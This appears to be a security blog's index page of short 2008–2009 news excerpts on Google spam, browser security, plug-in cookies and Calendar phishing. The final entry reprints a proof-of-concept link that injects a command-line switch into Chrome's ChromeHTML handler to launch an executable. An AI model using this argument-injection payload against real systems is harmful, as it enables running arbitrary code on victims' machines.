Google Named No. 3 Spam Provider

Tuesday, January 6th, 2009

According to this eWeek article, Google has been named the #3 spam provider in the world in the most recent Spamhaus Statistics. They are stating the reason as "Spammers have had success cracking the CAPTCHA tests and creating Gmail accounts from which to spam. Because the spam comes from a ...

Google’s Browser Security Handbook

Sunday, January 4th, 2009

This document is meant to provide web application developers, browser engineers, and information security researchers with a one-stop reference to key security properties of contemporary web browsers. Insufficient understanding of these often poorly-documented characteristics is a major contributing factor to the prevalence of several classes of security vulnerabilities. Although all browsers ...

Watch out for hidden cookies

Wednesday, December 31st, 2008

By now, most of us are aware of the potential privacy risks posed by Web cookies. But according to a new paper published by security consultancy iSec Partners, traditional browser-based cookies aren't the only technology used to store user data anymore. A number of browser plug-ins offer similar capabilities -- ...

Google Calendar Phishing returns

Monday, December 29th, 2008

In his blog, Graham Cluley of Sophos alerts his readers to the return of Google Calendar phishing attacks. Originally spotted in the summer, Google Calendar phishing uses event invitations to Calendar users asking them to "Verify Your Account" or face account deletion. Victims of this phish are asked to accept ...

Google Chrome Remote Parameter Injection

Tuesday, December 23rd, 2008

Google Chrome Browser (ChromeHTML://) remote parameter injection POC
by Nine:Situations:Group::bellick&strawdog
Site: http://retrogod.altervista.org/
tested against: Internet Explorer 8 beta 2, Google Chrome 1.0.154.36, Microsoft Windows XP SP3
List of command line switches: http://src.chromium.org/svn/trunk/src/chrome/common/chrome_switches.cc
Original url: http://retrogod.altervista.org/9sg_chrome.html

click the following link with IE while monitoring with procmon --> <a href='chromehtml:www.google.com"%20--renderer-path="c:\windows\system32\calc.exe"%20--"'>click me</a>

Source: http://www.milw0rm.com/exploits/7566